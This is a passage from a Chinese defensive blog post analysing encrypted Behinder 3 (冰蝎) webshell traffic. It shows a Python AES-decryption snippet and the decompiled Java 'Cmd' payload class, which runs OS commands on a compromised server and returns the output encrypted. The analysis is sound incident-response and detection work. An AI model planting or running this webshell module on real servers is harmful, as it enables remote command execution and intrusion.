NZV8P9TmOtDTaif73tPHEV5+bkU9TiGXnUde5mqlroIQgw"
    data=base64.b64decode(data)
    
    # mi = aes_encode(data,key)
    # print("加密值:",mi)
    # s=aes_decode(data,key)
    #print("解密值:",s)

    a = aes_decode(data,key)
    open('3.class','wb').write(a)

最后对生成的class 文件进行反编译

反编译后执行代码内容如下:


package net.rebeyond.behinder.payload.java;

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.nio.charset.Charset;
import java.util.HashMap;
import java.util.Map;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.ServletOutputStream;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpSession;
import javax.servlet.jsp.PageContext;

public class Cmd {
    public static String cmd = "pwd";
    private ServletRequest Request;
    private ServletResponse Response;
    private HttpSession Session;

    public boolean equals(Object obj) {
        PageContext page = (PageContext) obj;
        this.Session = page.getSession();
        this.Response = page.getResponse();
        this.Request = page.getRequest();
        page.getResponse().setCharacterEncoding("UTF-8");
        Map<String, String> result = new HashMap<>();
        try {
            result.put("msg", RunCMD(cmd));
            result.put("status", "success");
            try {
            } catch (Exception e) {
                e.printStackTrace();
            }
        } catch (Exception e2) {
            result.put("msg", e2.getMessage());
            result.put("status", "success");
            try {
            } catch (Exception e3) {
                e3.printStackTrace();
            }
        } finally {
            try {
                ServletOutputStream so = this.Response.getOutputStream();
                so.write(Encrypt(buildJson(result, true).getBytes("UTF-8")));
                so.flush();
                so.close();
                page.getOut().clear();
            } catch (Exception e4) {
                e4.printStackTrace();
            }
        }
        return true;
    }

    private String RunCMD(String cmd2) throws Exception {
        Process p;
        Charset osCharset = Charset.forName(System.getProperty("sun.jnu.encoding"));
        String result = "";
        if (cmd2 == null || cmd2.length() <= 0) {
            return result;
        }
        if (System.getProperty("os.name").toLowerCase().indexOf("windows") >= 0) {
            p = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", cmd2});
        } else {
            p = Runtime.getRuntime().exec(cmd2);
        }
        BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream(), "GB2312"));
        String disr = br.readLine();
        String result2 = result;
        while (disr != null) {
            String result3 = result2 + disr + "\n";
            disr = br.readLine();
            result2 = result3;
        }
        return new String(result2.getBytes(osCharset));
    }

    private byte[] Encrypt(byte[] bs) throws Exception {
        SecretKeySpec skeySpec = new SecretKeySpec(this.Session.getAttribute("u").toString().getBytes("utf-8"), "AES");
        Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
        cipher.init(1, skeySpec);
        return cipher.doFinal(bs);
    }

    private String buildJson(Map<String, String> entity, boolean encode) throws Exception {
        StringBuilder sb = new StringBuilder();
        String version = System.getProperty("java.version");
        sb.append("{");
        for (String key : entity.keySet()) {
            sb.append("\"" + key + "\":\"");
            String value = ((String) entity.get(key)).toString();
            if (encode) {
                if (version.compareTo("1.9") >= 0) {
                    getClass();
                    Class Base64 = Class.forName("java.util.Base64");
                    Object Encoder = Base64.getMethod("getEncoder", null).invoke(Base64, null);
                    value = (String) Encoder.getClass().getMethod("encodeToString", new Class[]{byte[].class}).invoke(Encoder, new Object[]{value.getBytes("UTF-8")});
                } else {
                    getClass();
                    Object Encoder2 = Class.forName("sun.misc.BASE64Encoder").newInstance();
                    value = ((String) Encoder2.getClass().getMethod("encode", new Class[]{byte[].class}).invoke(Encoder2, new Object[]{value.getBytes("UTF-8")})).replace("\n", "").replace("\r", "");
                }
            }
            sb.append(value);
            sb.append("\",");
        }
        if (sb.toString().endsWith(",")) {
            sb.setLength(sb.length() - 1);
        }
        sb.append("}");
        return sb.toString();
    }
}

还原请求内容 这里为pwd

可以看到pwd的结果被成功解密

总结: 遇到冰蝎3的时候不要过于慌张,这时候我们找到webshell 何时被部署、通过很么洞打进来的,找到webshell的存放位置,通过我们的全流量进行回溯,了解攻击者后续做了那些行为。

此篇文章通过防守方流量识别角度进行分析。并没有去说明一些UA的识别问题,毕竟BX是可以随意修改这些流量头的

后续文章陆续推出哥斯拉以及内存马的识别与流量分析特征的提取,后续协助大家自定义waf的监测规则。

承接CTF培训、出题【全系全套】

渗透测试项目(包括红蓝方向)、安全咨询项目

本文分享自微信公众号 - 黑伞攻防实验室(hack_umbrella),作者:马努

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-11-24

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 冰蝎3.0绕过HIDS原理分析|美创安全实验室

    最流行的WebShell客户端—冰蝎,于近日发布了最新版3.0。最新版一经发出便火速在安全圈广泛传播,究其原因是因为新版冰蝎较之前版本进行了大量修改,一举绕过了...

    数据安全
  • 冰蝎3.0简要分析

    冰蝎3.0 Beta 2今天发布,和v2.1相比,最重要的变化就是“去除动态密钥协商机制,采用预共享密钥,全程无明文交互,密钥格式为md5("admin...

    tinyfisher
  • 开胃菜:冰蝎2.0流量分析

    c3VjY2Vzcw== 为success NjhhNGQ0NDctYWQ4MC00MWZlLTg2M2YtYjJlZmUwYjkxZmIx 为68a4d447...

    用户2202688
  • 冰蝎动态二进制加密WebShell基于流量侧检测方案

    冰蝎是一款新型动态二进制加密网站工具。目前已经有6个版本。对于webshell的网络流量侧检测,主要有三个思路。一:webshell上传过程中文件还原进行样本分...

    FB客服
  • 冰蝎动态二进制加密WebShell特征分析

    冰蝎一款新型加密网站管理客户端,在实际的渗透测试过程中有非常不错的效果,能绕过目前市场上的大部分WAF、探针设备。本文将通过在虚拟环境中使用冰蝎,通过wires...

    FB客服
  • HTTP、HTTPS、加密型webshell一网打尽

    webshell是黑客进行网站攻击的一种恶意脚本,识别出webshell文件或通信流量可以有效地阻止黑客进一步的攻击行为。目前webshell的检测方法主要分为...

    绿盟科技研究通讯
  • 从Webshell的视角谈攻防对抗

    由于参加最近特殊多人活动的原因,很多渗透攻击武器也进行了对应的更新。冰蝎出了3.0版本、甚至还有好几个beta版本;还朋友圈还出了一个据说比冰蝎3.0还厉害的神...

    FB客服
  • 红蓝对抗——加密Webshell“冰蝎”攻防

    演练中,第一代webshell管理工具“菜刀”的攻击流量特征明显,容易被安全设备检测到,攻击方越来越少使用,加密webshell正变得越来越流行,由于流量加...

    tinyfisher
  • 红蓝对抗——加密Webshell“冰蝎” 流量 100%识别

    为什么进行两次访问? 我在别的文章没有看到关于这个问题的答案,于是我去反编译冰蝎源码

    HACK学习
  • 腾讯服务器平台架构师精彩分享天蝎3.0整机设计方向

    "鹅厂网事"由深圳市腾讯计算机系统有限公司技术工程事业群网络平台部运营,我们希望与业界各位志同道合的伙伴交流切磋最新的网络、服务器行业动态信息,同时分享腾讯在网...

    鹅厂网事
  • 冰蝎-特征检测及报文解密

    19年驻场于某金融单位。参加19年9月、11月两次攻防演练,负责攻防演练组织、技术支持和复盘。期间,多个攻击队伍使用冰蝎 webshell ,防守方监测时确实各...

    重生信息安全
  • 全程带阻:记一次授权网络攻防演练(下)

    完整攻击链大概包括信息搜集、漏洞利用、建立据点、权限提升、权限维持、横向移动、痕迹清除等七步,虽然这个站点只经历了前四步,但也具有较强的代表性,组合利用漏洞形成...

    FB客服
  • 你所不知道的Webshell--基础篇

    企业对外提供服务的应用通常以Web形式呈现,因此Web站点经常成为攻击者的攻击目标。

    绿盟科技安全情报
  • 雨笋教育干货分享:0day漏洞利用及抓取的姿势

    整个过程仅讲思路的实现,因笔者日常工作并不相关,从构思到实现,前前后后大概花了两个月时间,未对数据进行整理,也未列出具体的步骤,仅供研究与参考,思路如有雷同,那...

    雨笋教育
  • 冰蝎2和3及哥斯拉Godzilla特征分析

    使用随机数MD5的高16位作为密钥,存储到会话的 $_SESSION 变量中,并返回密钥给攻击者。

    FB客服
  • Java安全之安全加密算法

    本篇文来谈谈关于常见的一些加密算法,其实在此之前,对算法的了解并不是太多。了解的层次只是基于加密算法的一些应用上。也来浅谈一下加密算法在安全领域中的作用。写本篇...

    全栈程序员站长
  • 杂谈Java内存Webshell的攻与防

    这篇文章主要以Tomcat为例子记录了一些关于Java内存Webshell利用与检测以及相关的思考。

    用户2202688
  • JBOOS渗透复盘记录

    逛先知社区的时候发现(https://xz.aliyun.com/t/9477)一篇文章,刚好闲来无事,打算复现一波,FOFA找了几个点后,成功的找到了一个存在...

    天钧
  • 实战中内网穿透的打法

    在内网渗透时,一个WebShell或CobaltStrike、Metasploit上线等,只是开端,更多是要内网横向移动,扩大战果,打到核心区域。但后渗透的前提...

    洛米唯熊

扫码关注云+社区

领取腾讯云代金券